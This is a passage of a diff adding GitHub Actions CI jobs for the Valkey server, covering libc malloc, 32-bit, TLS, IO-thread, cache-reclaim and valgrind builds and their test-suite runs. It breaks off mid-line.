elif [ -f ./src/valkey-unit-tests ]; then + ./src/valkey-unit-tests --accurate + fi + test-ubuntu-libc-malloc: + runs-on: ubuntu-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && + (github.event.pull_request.base.ref != 'unstable' || + contains(github.event.pull_request.labels.*.name, 'run-extra-tests')) && + (github.event.action != 'labeled' || + (github.event.pull_request.base.ref == 'unstable' && github.event.label.name == 'run-extra-tests')) + )) && + !contains(github.event.inputs.skipjobs, 'malloc') + timeout-minutes: 1440 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - run: cd libbacktrace && ./configure && make && sudo make install + - name: make + run: make MALLOC=libc SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + - name: testprep + run: sudo apt-get install tcl8.6 tclx + - name: test + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: ./runtest ${{ github.event_name != 'pull_request' && '--accurate' || '' }} --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: module api test + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: CFLAGS='-Werror' ./runtest-moduleapi --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: sentinel tests + if: true && !contains(github.event.inputs.skiptests, 'sentinel') + run: ./runtest-sentinel ${{github.event.inputs.cluster_test_args}} + - name: cluster tests + if: true && !contains(github.event.inputs.skiptests, 'cluster') + run: ./runtest-cluster ${{github.event.inputs.cluster_test_args}} + test-ubuntu-no-malloc-usable-size: + runs-on: ubuntu-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && + (github.event.pull_request.base.ref != 'unstable' || + contains(github.event.pull_request.labels.*.name, 'run-extra-tests')) && + (github.event.action != 'labeled' || + (github.event.pull_request.base.ref == 'unstable' && github.event.label.name == 'run-extra-tests')) + )) && + !contains(github.event.inputs.skipjobs, 'malloc') + timeout-minutes: 1440 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - run: cd libbacktrace && ./configure && make && sudo make install + - name: make + run: make MALLOC=libc CFLAGS=-DNO_MALLOC_USABLE_SIZE SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + - name: testprep + run: sudo apt-get install tcl8.6 tclx + - name: test + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: ./runtest ${{ github.event_name != 'pull_request' && '--accurate' || '' }} --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: module api test + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: CFLAGS='-Werror' ./runtest-moduleapi --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: sentinel tests + if: true && !contains(github.event.inputs.skiptests, 'sentinel') + run: ./runtest-sentinel ${{github.event.inputs.cluster_test_args}} + - name: cluster tests + if: true && !contains(github.event.inputs.skiptests, 'cluster') + run: ./runtest-cluster ${{github.event.inputs.cluster_test_args}} + test-ubuntu-32bit: + runs-on: ubuntu-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && + (github.event.pull_request.base.ref != 'unstable' || + contains(github.event.pull_request.labels.*.name, 'run-extra-tests')) && + (github.event.action != 'labeled' || + (github.event.pull_request.base.ref == 'unstable' && github.event.label.name == 'run-extra-tests')) + )) && + !contains(github.event.inputs.skipjobs, '32bit') + timeout-minutes: 1440 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - name: Build libbacktrace + run: | + sudo apt-get update && sudo apt-get install libc6-dev-i386 g++-multilib + cd libbacktrace && ./configure && make && sudo make install + - name: Install gtest + run: | + sudo apt-get update + sudo apt-get install libgtest-dev + mkdir -p /tmp/gtest32 + cd /tmp/gtest32 + cmake -B build32 \ + -DCMAKE_BUILD_TYPE=Release \ + -DCMAKE_C_FLAGS="-m32" \ + -DCMAKE_CXX_FLAGS="-m32" \ + -DCMAKE_EXE_LINKER_FLAGS="-m32" \ + /usr/src/googletest + cmake --build build32 --parallel + sudo cp build32/lib/*.a /usr/lib32/ + cd $GITHUB_WORKSPACE + - name: make + run: | + make 32bit SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes \ + GTEST_CFLAGS="-I/usr/src/googletest/googletest/include -I/usr/src/googletest/googlemock/include" \ + GTEST_LIBS="/usr/lib32/libgtest.a /usr/lib32/libgmock.a" + - name: testprep + run: sudo apt-get install tcl8.6 tclx + - name: test + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: ./runtest ${{ github.event_name != 'pull_request' && '--accurate' || '' }} --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: module api test + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: | + make -C tests/modules 32bit # the script below doesn't have an argument, we must build manually ahead of time + CFLAGS='-Werror' ./runtest-moduleapi --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: sentinel tests + if: true && !contains(github.event.inputs.skiptests, 'sentinel') + run: ./runtest-sentinel ${{github.event.inputs.cluster_test_args}} + - name: cluster tests + if: true && !contains(github.event.inputs.skiptests, 'cluster') + run: ./runtest-cluster ${{github.event.inputs.cluster_test_args}} + - name: unittest + if: true && !contains(github.event.inputs.skiptests, 'unittest') + run: | + if [ -f ./src/unit/valkey-unit-gtests ]; then + make test-unit accurate=1 \ + GTEST_CFLAGS="-I/usr/src/googletest/googletest/include -I/usr/src/googletest/googlemock/include" \ + GTEST_LIBS="/usr/lib32/libgtest.a /usr/lib32/libgmock.a" + elif [ -f ./src/valkey-unit-tests ]; then + ./src/valkey-unit-tests --accurate + fi + test-ubuntu-tls: + runs-on: ubuntu-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && + (github.event.pull_request.base.ref != 'unstable' || + contains(github.event.pull_request.labels.*.name, 'run-extra-tests')) && + (github.event.action != 'labeled' || + (github.event.pull_request.base.ref == 'unstable' && github.event.label.name == 'run-extra-tests')) + )) && + !contains(github.event.inputs.skipjobs, 'tls') + timeout-minutes: 1440 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - run: cd libbacktrace && ./configure && make && sudo make install + - name: make + run: make BUILD_TLS=yes SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + - name: testprep + run: | + sudo apt-get install tcl8.6 tclx tcl-tls + ./utils/gen-test-certs.sh + - name: test + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: | + ./runtest ${{ github.event_name != 'pull_request' && '--accurate' || '' }} --verbose --dump-logs --tls --dump-logs ${{github.event.inputs.test_args}} + - name: module api test + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: | + CFLAGS='-Werror' ./runtest-moduleapi --verbose --dump-logs --tls --dump-logs ${{github.event.inputs.test_args}} + - name: sentinel tests + if: true && !contains(github.event.inputs.skiptests, 'sentinel') + run: | + ./runtest-sentinel --tls ${{github.event.inputs.cluster_test_args}} + - name: cluster tests + if: true && !contains(github.event.inputs.skiptests, 'cluster') + run: | + ./runtest-cluster --tls ${{github.event.inputs.cluster_test_args}} + test-ubuntu-tls-no-tls: + runs-on: ubuntu-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && + (github.event.pull_request.base.ref != 'unstable' || + contains(github.event.pull_request.labels.*.name, 'run-extra-tests')) && + (github.event.action != 'labeled' || + (github.event.pull_request.base.ref == 'unstable' && github.event.label.name == 'run-extra-tests')) + )) && + !contains(github.event.inputs.skipjobs, 'tls') + timeout-minutes: 1440 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - run: cd libbacktrace && ./configure && make && sudo make install + - name: make + run: make BUILD_TLS=yes SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + - name: testprep + run: | + sudo apt-get install tcl8.6 tclx tcl-tls + ./utils/gen-test-certs.sh + - name: test + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: | + ./runtest ${{ github.event_name != 'pull_request' && '--accurate' || '' }} --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: module api test + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: | + CFLAGS='-Werror' ./runtest-moduleapi --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: sentinel tests + if: true && !contains(github.event.inputs.skiptests, 'sentinel') + run: | + ./runtest-sentinel ${{github.event.inputs.cluster_test_args}} + - name: cluster tests + if: true && !contains(github.event.inputs.skiptests, 'cluster') + run: | + ./runtest-cluster ${{github.event.inputs.cluster_test_args}} + test-ubuntu-io-threads: + runs-on: ubuntu-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && + (github.event.pull_request.base.ref != 'unstable' || + contains(github.event.pull_request.labels.*.name, 'run-extra-tests')) && + (github.event.action != 'labeled' || + (github.event.pull_request.base.ref == 'unstable' && github.event.label.name == 'run-extra-tests')) + )) && + !contains(github.event.inputs.skipjobs, 'iothreads') + timeout-minutes: 1440 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - run: cd libbacktrace && ./configure && make && sudo make install + - name: make + run: make SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + - name: testprep + run: sudo apt-get install tcl8.6 tclx + - name: test + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: ./runtest --io-threads --accurate --verbose --tags network --dump-logs ${{github.event.inputs.test_args}} + - name: cluster tests + if: true && !contains(github.event.inputs.skiptests, 'cluster') + run: ./runtest-cluster --io-threads ${{github.event.inputs.cluster_test_args}} + test-ubuntu-tls-io-threads: + runs-on: ubuntu-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && + (github.event.pull_request.base.ref != 'unstable' || + contains(github.event.pull_request.labels.*.name, 'run-extra-tests')) && + (github.event.action != 'labeled' || + (github.event.pull_request.base.ref == 'unstable' && github.event.label.name == 'run-extra-tests')) + )) && + !contains(github.event.inputs.skipjobs, 'tls') && !contains(github.event.inputs.skipjobs, 'iothreads') + timeout-minutes: 1440 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - run: cd libbacktrace && ./configure && make && sudo make install + - name: make + run: make BUILD_TLS=yes SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + - name: testprep + run: | + sudo apt-get install tcl8.6 tclx tcl-tls + ./utils/gen-test-certs.sh + - name: test + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: | + ./runtest --io-threads --tls --accurate --verbose --tags network --dump-logs ${{github.event.inputs.test_args}} + - name: cluster tests + if: true && !contains(github.event.inputs.skiptests, 'cluster') + run: | + ./runtest-cluster --io-threads --tls ${{github.event.inputs.cluster_test_args}} + test-ubuntu-reclaim-cache: + runs-on: ubuntu-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && + (github.event.pull_request.base.ref != 'unstable' || + contains(github.event.pull_request.labels.*.name, 'run-extra-tests')) && + (github.event.action != 'labeled' || + (github.event.pull_request.base.ref == 'unstable' && github.event.label.name == 'run-extra-tests')) + )) && + !contains(github.event.inputs.skipjobs, 'specific') + timeout-minutes: 1440 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - run: cd libbacktrace && ./configure && make && sudo make install + - name: make + run: make SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + - name: testprep + run: "sudo apt-get install vmtouch\nmkdir /tmp/master \nmkdir /tmp/slave\n" + - name: warm up + run: | + ./src/valkey-server --daemonize yes --logfile /dev/null + ./src/valkey-benchmark -n 1 > /dev/null + ./src/valkey-cli save | grep OK > /dev/null + vmtouch -v ./dump.rdb > /dev/null + - name: test + run: | + echo "test SAVE doesn't increase cache" + CACHE0=$(grep -w file /sys/fs/cgroup/memory.stat | awk '{print $2}') + echo "$CACHE0" + ./src/valkey-server --daemonize yes --logfile /dev/null --dir /tmp/master --port 8080 --repl-diskless-sync no --pidfile /tmp/master/valkey.pid --rdbcompression no --enable-debug-command yes + sleep 1 # wait for server startup + ./src/valkey-cli -p 8080 debug populate 10000 k 102400 + ./src/valkey-server --daemonize yes --logfile /dev/null --dir /tmp/slave --port 8081 --repl-diskless-load disabled --rdbcompression no + sleep 1 # wait for server startup + ./src/valkey-cli -p 8080 save > /dev/null + VMOUT=$(vmtouch -v /tmp/master/dump.rdb) + echo $VMOUT + grep -q " 0%" <<< $VMOUT + CACHE=$(grep -w file /sys/fs/cgroup/memory.stat | awk '{print $2}') + echo "$CACHE" + if [ "$(( $CACHE-$CACHE0 ))" -gt "8000000" ]; then exit 1; fi + echo "test replication doesn't increase cache" + ./src/valkey-cli -p 8081 REPLICAOF 127.0.0.1 8080 > /dev/null + while [ $(./src/valkey-cli -p 8081 info replication | grep "master_link_status:down") ]; do sleep 1; done; + sleep 1 # wait for the completion of cache reclaim bio + VMOUT=$(vmtouch -v /tmp/master/dump.rdb) + echo $VMOUT + grep -q " 0%" <<< $VMOUT + VMOUT=$(vmtouch -v /tmp/slave/dump.rdb) + echo $VMOUT + grep -q " 0%" <<< $VMOUT + CACHE=$(grep -w file /sys/fs/cgroup/memory.stat | awk '{print $2}') + echo "$CACHE" + if [ "$(( $CACHE-$CACHE0 ))" -gt "8000000" ]; then exit 1; fi + + echo "test reboot doesn't increase cache" + PID=$(cat /tmp/master/valkey.pid) + kill -15 $PID + while [ -x /proc/${PID} ]; do sleep 1; done + ./src/valkey-server --daemonize yes --logfile /dev/null --dir /tmp/master --port 8080 + sleep 1 # wait for server startup + while [ $(./src/valkey-cli -p 8080 info persistence | grep "loading:1") ]; do sleep 1; done; + sleep 1 # wait for the completion of cache reclaim bio + VMOUT=$(vmtouch -v /tmp/master/dump.rdb) + echo $VMOUT + grep -q " 0%" <<< $VMOUT + CACHE=$(grep -w file /sys/fs/cgroup/memory.stat | awk '{print $2}') + echo "$CACHE" + if [ "$(( $CACHE-$CACHE0 ))" -gt "8000000" ]; then exit 1; fi + test-valgrind-test: + runs-on: ubuntu-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && github.event.pull_request.base.ref != 'unstable' && github.event.action != 'labeled')) && + !contains(github.event.inputs.skipjobs, 'valgrind') && !contains(github.event.inputs.skiptests, 'valkey') + timeout-minutes: 1440 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - run: cd libbacktrace && ./configure && make && sudo make install + - name: make + run: make valgrind SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + - name: testprep + run: | + sudo apt-get update + sudo apt-get install tcl8.6 tclx valgrind -y + - name: test + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: ./runtest --valgrind --no-latency --verbose --clients 1 --timeout 2400 --dump-logs ${{github.event.inputs.test_args}} + test-valgrind-misc: + runs-on: ubuntu-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && github.event.pull_request.base.ref != 'unstable' && github.event.action != 'labeled')) && + !contains(github.event.inputs.skipjobs, 'valgrind') && !(contains(github.event.inputs.skiptests, 'modules') && contains(github.event.inputs.skiptests, 'unittest')) + timeout-minutes: 1440 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - run: cd libbacktrace && ./configure && make && sudo make install + - name: Install gtest + run: sudo apt-get install pkg-config libgtest-dev libgmock-dev + - name: make + run: make valgrind all-with-unit-tests SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + - name: testprep + run: | + sudo apt-get update + sudo apt-get install tcl8.6 tclx valgrind -y + - name: module api test + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: CFLAGS='-Werror' ./runtest-moduleapi --valgrind --no-latency --verbose --clients 1 --timeout 2400 --dump-logs ${{github.event.inputs.test_args}} + - name: unittest + if: true && !contains(github.event.inputs.skiptests, 'unittest') + run: | + if [ -f ./src/unit/valkey-unit-gtests ]; then + ./deps/gtest-parallel/gtest-parallel valgrind -- --track-origins=yes --suppressions=./src/valgrind.sup --show-reachable=no --show-possibly-lost=no --leak-check=full --log-file=err.%p.txt ./src/unit/valkey-unit-gtests --valgrind + if grep -qlE '0x[0-9A-Fa-f]+:' err.*.txt 2>/dev/null; then grep -lE '0x[0-9A-Fa-f]+:' err.*.txt | xargs cat; exit 1; fi + elif [ -f ./src/valkey-unit-tests ]; then + valgrind --track-origins=yes --suppressions=./src/valgrind.sup --show-reachable=no --show-possibly-lost=no --leak-check=full --log-file=err.txt ./src/valkey-unit-tests --valgrind + if grep -q 0x err.txt; then cat err.txt; exit 1; fi + fi + test-valgrind-no-malloc-usable-size-test: + runs-on: ubuntu-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && github.event.pull_request.base.ref != 'unstable' && github.event.action != 'labeled')) && + !contains(github.event.inputs.skipjobs, 'valgrind') && !contains(github.event.inputs.skiptests, 'valkey') + timeout-minutes: 1440 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - run: cd libbacktrace && ./configure && make && sudo make install + - name: make + run: make valgrind CFLAGS="-DNO_MALLOC_USABLE_SIZE" SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + - name: testprep + run: | + sudo apt-get update + sudo apt-get install tcl8.6 tclx valgrind -y + - name: test + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: ./runtest --valgrind --no-latency --verbose --clients 1 --timeout 2400 --dump-logs ${{github.event.inputs.test_args}} + test-valgrind-no-malloc-usable-size-misc: + runs-on: ubuntu-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && github.event.pull_request.base.ref != 'unstable' && github.event.action != 'labeled')) && + !contains(github.event.inputs.skipjobs, 'valgrind') && !(contains(github.event.inputs.skiptests, 'modules') && contains(github.event.inputs.skiptests, 'unittest')) + timeout-minutes: 1440 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> 